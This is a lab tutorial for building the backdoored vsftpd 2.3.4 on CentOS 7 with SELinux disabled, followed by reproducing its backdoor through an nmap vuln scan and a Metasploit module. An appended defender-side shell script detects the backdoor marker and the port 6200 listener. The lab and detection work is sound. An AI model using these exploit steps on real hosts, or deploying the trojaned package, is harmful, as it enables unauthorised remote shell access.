I. Setup on CentOS 7
Download: GitHub - shurongyugong/shurong.github.io at ftp2.3.4 (the "smiley face" vulnerability)
- Extract the archive
    tar -zxvf <archive>
    cd vsftpd-2.3.4
    chmod 777 *
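- Install the dependencies needed for compilation
    # If you hit the "/usr/bin/ld: 找不到 -lcap" (cannot find -lcap) error, install the libcap library and its development package
    yum install libcap libcap-devel -y
    # Check dependencies; this ensures the build and compile tools are installed
    yum groupinstall "Development Tools" -y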
- Compile and install. Output like the following indicates that the installation succeeded.
    make && make install
- Then run the following steps
    cp vsftpd.conf /etc                     # main configuration file
    cp RedHat/vsftpd.pam /etc/pam.d/ftp     # PAM authentication
- Edit the configuration file
    vim /etc/vsftpd.conf
  Change listen to yes
  Change local_enable to YES
- Edit /etc/xinetd.d/vsftpd
    vim /etc/xinetd.d/vsftpd
  Make sure disable is yes
- Disable SELinux: open the configuration file and change the setting here to disabled.
    vim /etc/selinux/config
- Start vsftpd
    /usr/local/sbin/vsftpd &
- Check whether it started; seeing two vsftpd processes means it is running normally.
    ps -eaf|grep vsftp
- Next, you can set vsftpd to start automatically at boot.
- First create the /etc/systemd/system/ftp.service file:
    [Unit]
    Description=/etc/rc.local Compatibility
    ConditionPathExists=/etc/rc.local

    [Service]
    Type=forking
    ExecStart=/etc/rc.local start
    TimeoutSec=0
    StandardOutput=tty
    RemainAfterExit=yes
    SysVStartPriority=99

    [Install]
    WantedBy=multi-user.target
- If there is no rc.local file, create it yourself in the /etc directory and make it executable:
    chmod +x /etc/rc.local
  Contents of /etc/rc.local:
    #!/bin/bash
    # THIS FILE IS ADDED FOR COMPATIBILITY PURPOSES
    #
    # It is highly advisable to create own systemd services or udev rules
    # to run scripts during boot instead of using this file.
    #
    # In contrast to previous versions due to parallel execution during boot
    # this script will NOT be run after all other services.
    #
    # Please note that you must run 'chmod +x /etc/rc.d/rc.local' to ensure
    # that this script will be executed during boot.
    /usr/local/sbin/vsftpd &
- Start ftp.service and enable it at boot
    sudo systemctl start ftp.service
    sudo systemctl enable ftp.service
II. Reproduction steps
- Scan the target IP to check whether the vulnerability is present; output like the following means it is.
    nmap --script=vuln -p 21 <target IP>
- Open msf and search for the corresponding attack module
    search vsftp
    use 0
- Set the IP and the payload
    set rhosts <target IP>
    show payloads
    set payload payload/cmd/unix/interact
    exploit
- The exploit runs successfully
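
As a defender-side complement to the lab above, the following added example (not from the original post) checks a vsftpd source tree for the backdoor marker before it is built and checks `ss -ltn` output for the backdoor's listener. The symbol name vsf_sysutil_extra and TCP port 6200 are assumptions taken from public analyses of the trojaned vsftpd-2.3.4 tarball, not from this page; the function names and sample data are constructed.

```shell
#!/bin/sh
# Added example, not from the original post. Marker symbol and port are
# assumptions from public analyses of the backdoored vsftpd-2.3.4 tarball.
BACKDOOR_SYMBOL='vsf_sysutil_extra'   # helper function present only in the trojaned source
BACKDOOR_PORT=6200                    # TCP port the backdoor's shell binds to

# audit_tree DIR
#   0 = no marker found, 1 = backdoor marker present, 2 = not a vsftpd source tree
audit_tree() {
    [ -f "$1/str.c" ] && [ -f "$1/sysdeputil.c" ] || return 2
    if grep -q "$BACKDOOR_SYMBOL" "$1/str.c" "$1/sysdeputil.c"; then
        return 1
    fi
    return 0
}

# has_backdoor_listener: reads `ss -ltn` output on stdin.
#   0 = a socket is listening on BACKDOOR_PORT, 1 = none
has_backdoor_listener() {
    awk -v port="$BACKDOOR_PORT" '
        $1 == "LISTEN" {
            n = split($4, part, ":")      # handles 0.0.0.0:21 and [::]:21
            if (part[n] == port) found = 1
        }
        END { exit !found }'
}

# Constructed sample of `ss -ltn` output from a lab host with the backdoor shell open.
SAMPLE_SS='State  Recv-Q Send-Q Local Address:Port Peer Address:Port
LISTEN 0      32     0.0.0.0:21         0.0.0.0:*
LISTEN 0      100    0.0.0.0:6200       0.0.0.0:*'

# Usage: sh check_vsftpd.sh /path/to/vsftpd-2.3.4
if [ "$#" -eq 1 ]; then
    rc=0; audit_tree "$1" || rc=$?
    case $rc in
        0) echo "source tree: no backdoor marker found" ;;
        1) echo "source tree: BACKDOORED ($BACKDOOR_SYMBOL present)" ;;
        2) echo "source tree: $1 is not a vsftpd source directory" ;;
    esac
    if ss -ltn 2>/dev/null | has_backdoor_listener; then
        echo "host: a socket is listening on TCP $BACKDOOR_PORT"
    fi
fi
```

Run it against the extracted directory before `make`; on a production host, a marker hit or a listener on that port means the package did not come from a trusted source and the host should be treated as compromised.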